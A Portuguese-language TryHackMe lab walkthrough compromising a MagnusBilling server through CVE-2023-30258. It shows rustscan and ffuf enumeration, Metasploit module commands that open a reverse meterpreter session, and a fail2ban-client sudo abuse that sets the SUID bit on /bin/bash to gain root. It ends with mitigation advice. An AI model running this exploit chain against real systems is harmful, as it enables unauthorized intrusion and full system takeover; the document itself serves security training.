
Passo a passo explorando CVE-2023-30258 (RCE no MagnusBilling) e escalando privilégios através de uma configuração incorreta do fail2ban em um laboratório TryHackMe. Demonstra enumeração web, exploração com Metasploit e escalada de privilégios no Linux.
⸻
🛡️ MagnusBilling RCE → Root (CVE-2023-30258)
📌 Visão Geral • Alvo: 10.145.148.203 • Plataforma: TryHackMe • Vulnerabilidade: CVE-2023-30258 • Acesso: Execução Remota de Código (RCE) sem autenticação • Escalação de Privilégios: configuração incorreta do fail2ban • Acesso Final: Root
⸻
🔍 1. Reconhecimento
Varredura de Portas
rustscan -a 10.145.148.203
📊 Portas Abertas
Porta Serviço
22 SSH
80 HTTP
3306 MySQL
5038 Asterisk

A presença do Asterisk sugere um sistema VoIP/faturamento.
⸻
🌐 2. Enumeração Web
Fuzzing de Diretórios
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c
📁 Descobertas: • /archive • /assets • /lib • /tmp • /protected
O caminho /mbilling é identificado como um possível vetor de ataque.

⸻
🚨 3. Identificação da Vulnerabilidade
CVE-2023-30258
O MagnusBilling é vulnerável a: • Execução Remota de Código (RCE) sem autenticação • Injeção de Comandos • Comprometimento total do sistema
⸻
💣 4. Exploração (Metasploit)
msfconsole
search CVE:2023-30258
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run

⸻
🎯 Resultado
meterpreter session opened
sysinfo
OS: Linux Debian User: asterisk
⸻
🔐 5. Acesso Inicial
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
asterisk
⸻
🏁 6. Flag do Usuário
cd /home/magnus cat user.txt
⸻
🔎 7. Escalação de Privilégios
Verificar sudo
sudo -l
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Configuração incorreta crítica detectada!
⸻
💣 8. Explorando o Fail2Ban
Adicionar uma ação maliciosa
sudo fail2ban-client set mbilling_login addaction evil
sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"
sudo fail2ban-client set mbilling_login banip 127.0.0.1
⸻
🚀 9. Acesso Root
/bin/bash -p
id
euid=0(root)
Inicialmente, whoami retornou asterisk. Usar bash -p eleva para root.
⸻
👑 10. Flag Root
cat /root/root.txt
⸻
🧠 11. Principais Lições • A exploração da CVE forneceu acesso inicial fácil • A enumeração web é fundamental (o ffuf identificou /mbilling) • Sudo mal configurado pode levar ao comprometimento total do sistema • O fail2ban pode ser abusado para escalação de privilégios
⸻
🛡️ 12. Mitigação • Atualizar o MagnusBilling para a versão mais recente • Remover NOPASSWD da configuração do sudo • Restringir o acesso ao fail2ban-client • Endurecer aplicações web e endpoints
⸻
💀 Conclusão
Esta máquina demonstra uma cadeia de ataque realista:
RCE Web → Shell → Escalação de Privilégios → Root
Uma combinação de vulnerabilidade + configuração incorreta levou ao comprometimento total do sistema.